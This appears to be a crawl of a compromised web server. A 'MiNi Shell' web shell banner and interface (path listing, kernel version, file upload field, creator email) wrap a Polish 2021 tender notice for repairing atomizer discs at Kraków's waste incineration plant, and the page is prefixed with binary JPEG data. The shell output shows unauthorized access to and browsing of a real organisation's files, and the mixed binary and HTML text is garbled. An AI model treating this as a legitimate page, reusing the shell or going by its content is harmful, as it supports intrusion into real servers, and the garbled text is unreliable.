JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210528/0006820701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00068207 z dnia 2021-05-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Regeneracja i naprawa dwóch sztuk dysków rozpyłowych typ Ax8-210 urządzenia rozpyłowego F100 zabudowanych w Zakładzie Termicznego Przekształcania Odpadów w Krakowie- zamówienie powtórzone </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krakowski Holding Komunalny S. A. w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351118089</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Brożka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-347</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@khk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://khk.krakow.pl/pl/bip/ogloszenia-i-przetargi/zamowienia-publiczne/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Regeneracja i naprawa dwóch sztuk dysków rozpyłowych typ Ax8-210 urządzenia rozpyłowego F100 zabudowanych w Zakładzie Termicznego Przekształcania Odpadów w Krakowie- zamówienie powtórzone </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7f4db0fd-bf7c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00068207</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/khk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14.1.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w PZP, odbywa się przy użyciu środków komunikacji elektronicznej. 14.2.<br/>Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności<br/>nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania,<br/>ofert, o ile jej treść jest udokumentowana. 14.3. Forma dokumentów: 14.3.1. Dokumenty, o których<br/>mowa w pkt 12.1 SWZ, Wykonawca składa wraz z ofertą:14.3.1.1. w formie elektronicznej (z<br/>wykorzystaniem kwalifikowanego podpisu elektronicznego) lub postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym lub 14.3.1.2. w formie elektronicznej kopii poświadczonej<br/>za zgodność z oryginałem przez notariusza (dotyczy pełnomocnictwa) lub 14.3.1.3. w formie<br/>elektronicznej kopii poświadczonej za zgodność z oryginałem przez Wykonawcę z wykorzystaniem<br/>kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego (dotyczy kopii<br/>wyciągów z odpowiednich rejestrów).14.3.2. Dokumenty, o których mowa w pkt. 12.3 SWZ składa się w<br/>formie elektronicznej (z wykorzystaniem kwalifikowanego podpisu elektronicznego) lub postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 14.3.3. Pozostałe dokumenty,<br/>poza wskazanymi w pkt. 14.3.1 i 14.3.2 SWZ, składane są w formie elektronicznej (z wykorzystaniem<br/>kwalifikowanego podpisu elektronicznego) lub postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym lub kopii poświadczonej za zgodność z oryginałem w formie elektronicznej, (z<br/>wykorzystaniem kwalifikowanego podpisu elektronicznego) lub postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. 14.3.4. Poświadczenia za zgodność z oryginałem<br/>dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polega Wykonawca,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo Podwykonawca, w<br/>zakresie dokumentów, które każdego z nich dotyczą. Poświadczenie może również wydać<br/>notariusz.14.3.5. Poświadczenie za zgodność z oryginałem dokumentu następuje w formie<br/>elektronicznej.14.3.6. Zamawiający zwraca uwagę, że podpis odręczny nie jest podpisem osobistym w<br/>myśl przepisów ustawy z dnia 6 sierpnia 2010 r. o dowodach osobistych ( DZ. U. z 2020 r. poz. 332 z<br/>późn. zm.).14.3.7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na<br/>język polski. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język<br/>polski. W przypadku wskazania przez Wykonawcę dostępności podmiotowych środków dowodowych,pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający<br/>może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez<br/>Zamawiającego podmiotowych środków dowodowych lub dokumentów.14.3.8. W pozostałym zakresie<br/>stosuje się przepisy Rozporządzenia Rady Ministrów wydanego na podstawie art. 70 ustawy PZP.14.4.<br/>Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują<br/>elektronicznie poprzez: https://platformazakupowa.pl/pn/khk (wyjątkowo na adres mailowy:<br/>przetargi@khk.krakow.pl). UWAGA: niedopuszczalnym jest złożenie oferty w sposób inny niż<br/>wskazany w pkt 18. SWZ.14.5. Platforma, o której mowa w pkt. poprzedzającym:14.5.1. Instrukcja<br/>obsługi platformy, znajduje się pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje; 14.5.2.<br/>Komunikacja poprzez ”Wyślij wiadomość” umożliwia dodanie do treści wysyłanej wiadomości plików lub<br/>spakowanego katalogu (załączników). Występuje limit objętości plików lub spakowanych folderów do<br/>ilości 10 plików lub spakowanych folderów przy maksymalnej sumarycznej wielkości 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">26.1. Zamawiający informuje, że: 26.1.1. administratorem<br/>Pani/Pana danych osobowych jest Zamawiający. 26.1.2. Kontakt do inspektora ochrony danych<br/>osobowych: iod@khk.krakow.pl, tel.: 12 269 15 05. 26.1.3. Pani/Pana dane osobowe przetwarzane<br/>będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego na zamawiającym, w<br/>celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.26.1.4. odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP oraz odpowiednie organy kontrole w zakresie<br/>ich kompetencji; 26.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą<br/>być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r.<br/>o narodowym zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020 r. poz. 164 z późn. zm.) i przepisów<br/>wykonawczych do tej ustawy. 26.1.6. obowiązek podania przez Panią/Pana danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP; 26.1.7. w odniesieniu do Pani/Pana danych<br/>osobowych decyzje nie będą podejmowane w sposób zautomatyzowany. 26.1.8. posiada<br/>Pani/Pan:26.1.8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących;26.1.8.2. prawo do<br/>sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania)26.1.8.3. prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego); 26.1.8.4. prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy;26.1.9. nie przysługuje Pani/Panu:26.1.9.1.<br/>prawo do usunięcia danych osobowych;26.1.9.2. prawo do przenoszenia danych osobowych;26.1.9.3.<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na<br/>zamawiającym. 26.2. Ponadto Zamawiający informuje, iż: 26.2.1. w przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu;26.2.2. wystąpienie z żądaniem,<br/>o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP-271-PT-4/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest usługa regeneracji dwóch dysków rozpyłowych typu Ax8-210<br/>urządzenia rozpyłowego F100 wbudowanych w instalację oczyszczania spalin w Zakładzie<br/>Termicznego Przekształcania Odpadów w Krakowie.3.2. Szczegółowy opis przedmiotu<br/>zamówienia stanowi załącznik 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium oceny - cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 12.1.3. Aktualne na dzień składania ofert oświadczenie, o którym mowa w<br/>art. 125 ust. 1 PZP o niepodleganiu wykluczeniu, w zakresie wskazanym w pkt. 10.1 SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1. Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w<br/>wysokości: 5 000,00 zł (pięć tysięcy złotych 00/100).16.2. Wadium wnosi się przed upływem<br/>terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z<br/>wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.16.3. Wadium<br/>wnosi się w następujących formach:16.3.1. pieniądzu,16.3.2. gwarancjach bankowych,16.3.3.<br/>gwarancjach ubezpieczeniowych,16.3.4. poręczeniach udzielanych przez podmioty, o których<br/>mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku – o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836, 1572).16.4. Uwaga: Wadium<br/>wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego<br/>powinno zawierać następujące elementy:16.4.1. określenie terminu obowiązywania poręczenia<br/>lub gwarancji przez cały okres związania ofertą;16.4.2. określenie kwoty poręczenia lub<br/>gwarancji;16.4.3. wskazanie gwaranta poręczenia lub gwarancji;16.4.4. wskazanie beneficjenta<br/>poręczenia lub gwarancji;16.4.5. zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo<br/>tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta,16.4.6.<br/>nieodwołalność poręczenia lub gwarancji,16.5. W przypadku wniesienia wadium w formie<br/>pieniężnej należy je wpłacić przelewem na konto Zamawiającego:Nazwa banku: Santander<br/>Bank Polska S.A.Numer konta 73 1090 2053 0000 0001 4761 7962(IBAN:<br/>PL73109020530000000147617962, SWIFT: WBKPPLPP)powołując się na nazwę<br/>postępowania, nr sprawy oraz podając nazwę banku i numer swojego konta, na które należy<br/>zwrócić wadium.16.6. Za skuteczne wniesione wadium w pieniądzu, Zamawiający uważa<br/>wadium, które w oznaczonym terminie (przed upływem terminu składania ofert lub wniosków)<br/>znajdzie się na rachunku bankowym Zamawiającego (decyduje data uznania rachunku<br/>Zamawiającego).16.7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia,<br/>Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.16.8. Zamawiający dopuszcza złożenie wadium w kilku formach przy<br/>jednoczesnym spełnieniu powyższych obowiązków. 16.9. Zasady zwrotu i zatrzymania wadium<br/>określa PZP.16.10. Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art.<br/>98 ust. 2 PZP powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez<br/>niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:9.2.1. Wykonawcy tacy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.9.2.2. Do<br/>Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków wprowadzenia są uwzględnione we wzorze<br/>umowy §10 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com